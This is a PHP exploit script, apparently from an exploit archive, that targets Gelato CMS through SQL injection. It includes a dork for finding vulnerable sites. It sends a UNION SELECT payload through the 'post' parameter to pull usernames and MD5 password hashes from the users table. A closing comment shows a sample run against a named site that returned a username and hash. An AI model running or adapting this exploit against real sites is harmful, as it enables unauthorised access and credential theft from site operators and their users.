<?
#_ Gelato SQL Injection exploit
#_ Dork: "powered by gelato cms"
#_ Homepage: http://gelatocms.com

#_ [ s 0 c r a t e x ]
#_ msn: s0cratex[at]nasa[dot]gov
#_ greetz: D.O.M and plexinium team

ini_set("max_execution_time",0);

function get_text(){
   $in = fopen("php://stdin", 'r');
   $text = fgets($in, 1024);
   $text = trim($text);
   return $text; }

echo "Gelato SQL Injection exploit -- by s0cratex\n";
echo "-------------------------------------------\n\n";

echo "Host (site.com): ";
$host = get_text();

echo "Path (/gelato): ";
$path = get_text();

echo "Prefix (gl_ / gel_): ";
$prefix = get_text();

if($host && $path && prefix){
$cnx = fsockopen($host,80);
if($cnx){
fwrite($cnx,"GET ".$path."/index.php?post=-1/**/union/**/select/**/1,concat(0x7330633a3a,login,0x3a3a,password,0x3a3a),null,null,null,null,null/**/from/**/".$prefix."users/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx)){ $resp .= fgets($cnx); }
fclose($cnx);

$login = strstr($resp,"s0c");
$login = explode("::",$login);
if(is_null($login[1]) || is_null($login[2])){ die("\nExploit failed... check the prefix..."); }
echo "\nUsername: ".$login[1];
echo "\nMD5 Hash: ".$login[2];
} else { die("\nConection problems..."); } 
} else { die("\nPlease check the data..."); }

/*
Gelato SQL Injection exploit -- by s0cratex
-------------------------------------------

Host (site.com): gelatocms.it
Path (/gelato): /
Prefix (gl_ / gel_): gel_

Username: wolly
MD5 Hash: 2eb7401af28ae266360b6028a26cc97a */

?>